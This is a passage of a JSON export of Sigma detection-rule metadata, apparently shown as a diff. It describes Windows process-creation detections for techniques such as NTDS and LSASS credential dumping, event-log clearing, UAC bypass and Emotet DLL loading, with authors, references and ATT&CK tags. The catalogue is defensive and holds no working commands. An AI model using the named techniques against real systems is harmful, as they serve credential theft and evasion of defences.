"uuid": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "value": "Execution via Diskshadow.exe" - }, - { - "description": "Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups.", - "meta": { - "author": "Furkan Caliskan (@caliskanfurkan_)", - "creation_date": "2020/07/04", - "falsepositive": [ - "Legitimate admin usage" - ], - "filename": "proc_creation_win_susp_ditsnap.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://github.com/yosqueoy/ditsnap", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ] - }, - "uuid": "d3b70aad-097e-409c-9df2-450f80dc476b", - "value": "DIT Snapshot Viewer Use" - }, - { - "description": "Detects a \"dllhost\" spawning with no commandline arguments which is a very rare thing to happen and could indicate process injection activity or malware mimicking similar system processes", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/27", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_dllhost_no_cli.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/child-processes/", - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ] - }, - "uuid": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "value": "Dllhost Process With No CommandLine" - }, - { - "description": "Execute C# code located in the consoleapp folder", - "meta": { - "author": "Beyu Denis, oscd.community", - "creation_date": "2019/10/26", - "falsepositive": [ - "Legitimate use of dnx.exe by legitimate user" - ], - "filename": "proc_creation_win_susp_dnx.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", - "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dnx.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1027.004" - ] - }, - "uuid": "81ebd28b-9607-4478-bf06-974ed9d53ed7", - "value": "Application Whitelisting Bypass via Dnx.exe" - }, - { - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "meta": { - "author": "Florian Roth (rule), @blu3_team (idea)", - "creation_date": "2019/06/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_double_extension.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", - "https://twitter.com/blackorbird/status/1140519090961825792", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "value": "Suspicious Double Extension" - }, - { - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2021/12/27", - "falsepositive": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" - ], - "filename": "proc_creation_win_susp_download_office_domain.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", - "https://twitter.com/mrd0x/status/1475085452784844803?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" - ], - "tags": "No established tags" - }, - "uuid": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "value": "Suspicious Download from Office Domain" - }, - { - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_dtrace_kernel_dump.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1474899714290208777?s=12", - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml" - ], - "tags": "No established tags" - }, - "uuid": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", - "value": "Suspicious Kernel Dump Using Dtrace" - }, - { - "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_electron_app_children.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://taggart-tech.com/quasar-electron/", - "https://github.com/mttaggart/quasar", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", - "value": "Suspicious Electron Application Child Processes" - }, - { - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "meta": { - "author": "FPT.EagleEye", - "creation_date": "2020/12/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_emotet_rundll32_execution.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", - "https://cyber.wtf/2021/11/15/guess-whos-back/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", - "value": "Emotet RunDLL32 Process Creation" - }, - { - "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", - "meta": { - "author": "sam0x90", - "creation_date": "2021/08/06", - "falsepositive": [ - "To be determined" - ], - "filename": "proc_creation_win_susp_esentutl_params.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816", - "https://attack.mitre.org/software/S0404/", - "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.003" - ] - }, - "uuid": "7df1713a-1a5b-4a4b-a071-dc83b144a101", - "value": "Esentutl Gather Credentials" - }, - { - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "meta": { - "author": "Ecco, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/09/26", - "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_eventlog_clear.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ] - }, - "uuid": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "value": "Suspicious Eventlog Clear or Configuration Using Wevtutil" - }, - { - "description": "Detects a suspicious execution from an uncommon folder", - "meta": { - "author": "Florian Roth, Tim Shelton", - "creation_date": "2019/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_execution_path.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", - "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - }, - "uuid": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", - "value": "Execution from Suspicious Folder" - }, - { - "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/01/16", - "falsepositive": [ - "Various applications", - "Tools that include ping or nslookup command invocations" - ], - "filename": "proc_creation_win_susp_execution_path_webserver.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "35efb964-e6a5-47ad-bbcd-19661854018d", - "value": "Execution in Webserver Root Folder" - }, - { - "description": "Attackers can use explorer.exe for evading defense mechanisms", - "meta": { - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", - "creation_date": "2020/10/05", - "falsepositive": [ - "Legitimate explorer.exe run from cmd.exe" - ], - "filename": "proc_creation_win_susp_explorer.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/CyberRaiju/status/1273597319322058752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", - "value": "Proxy Execution Via Explorer.exe" - }, - { - "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali, @gott_cyber", - "creation_date": "2019/06/29", - "falsepositive": [ - "Unknown how many legitimate software products use that method" - ], - "filename": "proc_creation_win_susp_explorer_break_proctree.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/CyberRaiju/status/1273597319322058752", - "https://twitter.com/bohops/status/1276357235954909188?s=12", - "https://twitter.com/nas_bench/status/1535322450858233858", - "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - }, - "uuid": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", - "value": "Explorer Process Tree Break" - }, - { - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/23", - "falsepositive": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" - ], - "filename": "proc_creation_win_susp_explorer_nouaccheck.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/ORCA6665/status/1496478087244095491", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548.002" - ] - }, - "uuid": "534f2ef7-e8a2-4433-816d-c91bccde289b", - "value": "Explorer NOUACCHECK Flag" - }, - { - "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", - "meta": { - "author": "Markus Neis, Sander Wiebing", - "creation_date": "2018/11/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_file_characteristics.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/muddywater/88059/", - "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.006" - ] - }, - "uuid": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", - "value": "Suspicious File Characteristics Due to Missing Fields" - }, - { - "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", - "meta": { - "author": "Victor Sergeev, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/GfxDownloadWrapper/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "eee00933-a761-4cd0-be70-c42fe91731e7", - "value": "GfxDownloadWrapper.exe Downloads File from Suspicious URL" - }, - { - "description": "Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).", - "meta": { - "author": "frack113", - "creation_date": "2021/12/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_findstr_385201.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_385201.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ] - }, - "uuid": "37db85d1-b089-490a-a59a-c7b6f984f480", - "value": "Suspicious Findstr 385201 Execution" - }, - { - "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", - "meta": { - "author": "Trent Liffick", - "creation_date": "2020/05/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_findstr_lnk.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_lnk.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1202", - "attack.t1027.003" - ] - }, - "uuid": "33339be3-148b-4e16-af56-ad16ec6c7e7b", - "value": "Findstr Launching .lnk File" - }, - { - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "meta": { - "author": "Florian Roth, omkar72, oscd.community", - "creation_date": "2021/02/24", - "falsepositive": [ - "Admin activity (unclear what they do nowadays with finger.exe)" - ], - "filename": "proc_creation_win_susp_finger_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", - "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", - "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "af491bca-e752-4b44-9c86-df5680533dbc", - "value": "Finger.exe Suspicious Invocation" - }, - { - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_format.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1477925112561209344", - "https://twitter.com/wdormann/status/1478011052130459653?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_format.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", - "value": "Format.com FileSystem LOLBIN" - }, - { - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "meta": { - "author": "Ecco, E.M. Anhaus, oscd.community", - "creation_date": "2019/09/26", - "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_fsutil_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", - "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ] - }, - "uuid": "add64136-62e5-48ea-807e-88638d02df1e", - "value": "Fsutil Suspicious Invocation" - }, - { - "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", - "meta": { - "author": "frack113", - "creation_date": "2022/05/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_gpresult.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", - "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1615" - ] - }, - "uuid": "e56d3073-83ff-4021-90fe-c658e0709e72", - "value": "Gpresult Display Group Policy Information" - }, - { - "description": "Detects creation of a scheduled task with a GUID like name", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/31", - "falsepositive": [ - "Legitimate software naming their tasks as GUIDs" - ], - "filename": "proc_creation_win_susp_guid_task_name.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ] - }, - "uuid": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", - "value": "Suspicious Scheduled Task Name As GUID" - }, - { - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/02/06", - "falsepositive": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" - ], - "filename": "proc_creation_win_susp_gup.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "0a4f6091-223b-41f6-8743-f322ec84930b", - "value": "Suspicious GUP Usage" - }, - { - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/10", - "falsepositive": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" - ], - "filename": "proc_creation_win_susp_gup_download.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nas_bench/status/1535322182863179776", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "44143844-0631-49ab-97a0-96387d6b2d7c", - "value": "Download Files Using Notepad++ GUP Utility" - }, - { - "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/10", - "falsepositive": [ - "Other parent binaries using GUP not currently identified" - ], - "filename": "proc_creation_win_susp_gup_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nas_bench/status/1535322445439180803", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "d65aee4d-2292-4cea-b832-83accd6cfa43", - "value": "Execute Arbitrary Binaries Using GUP Utility" - }, - { - "description": "Use of hostname to get information", - "meta": { - "author": "frack113", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_hostname.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hostname.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ] - }, - "uuid": "7be5fb68-f9ef-476d-8b51-0256ebece19e", - "value": "Suspicious Execution of Hostname" - }, - { - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "meta": { - "author": "Florian Roth (rule), Microsoft (idea)", - "creation_date": "2022/08/04", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_iis_module_registration.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml" - ], - "tags": "No established tags" - }, - "uuid": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "value": "Suspicious IIS Module Registration" - }, - { - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "meta": { - "author": "Max Altgelt", - "creation_date": "2021/12/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_image_missing.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://pentestlaboratories.com/2021/12/08/process-ghosting/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "71158e3f-df67-472b-930e-7d287acaa3e1", - "value": "Execution Of Non-Existing File" - }, - { - "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", - "meta": { - "author": "frack113", - "creation_date": "2022/01/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_instalutil.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "d042284c-a296-4988-9be5-f424fadcc28c", - "value": "Suspicious Execution of InstallUtil Without Log" - }, - { - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_invoke_webrequest_download.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", - "value": "Suspicious Invoke-WebRequest Usage" - }, - { - "description": "Detects suspicious IIS native-code module installations via command line", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/12/11", - "falsepositive": [ - "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" - ], - "filename": "proc_creation_win_susp_iss_module_install.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", - "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", - "value": "IIS Native-Code Module Command Line Installation" - }, - { - "description": "Detects the rare use of the command line tool shutdown to logoff a user", - "meta": { - "author": "frack113", - "creation_date": "2022/10/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_logoff.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_logoff.yml" - ], - "tags": [ - "attack.impact", - "attack.t1529" - ] - }, - "uuid": "ec290c06-9b6b-4338-8b6b-095c0f284f10", - "value": "Suspicious Execution of Shutdown to Log Out" - }, - { - "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", - "meta": { - "author": "Aaron Herman", - "creation_date": "2022/10/01", - "falsepositive": [ - "Legitimate applications installed on other partitions such as \"D:\"" - ], - "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt", - "https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_non_c_drive.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "5b80cf53-3a46-4adc-960b-05ec19348d74", - "value": "Wscript Execution from Non C Drive" - }, - { - "description": "Detects a suspicious LSASS process process clone that could be a sign of process dumping activity", - "meta": { - "author": "Florian Roth, Samir Bousseaden", - "creation_date": "2021/11/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_lsass_clone.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", - "https://twitter.com/Hexacorn/status/1420053502554951689", - "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" - ] - }, - "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", - "value": "Suspicious LSASS Process Clone" - }, - { - "description": "Use of reg to get MachineGuid information", - "meta": { - "author": 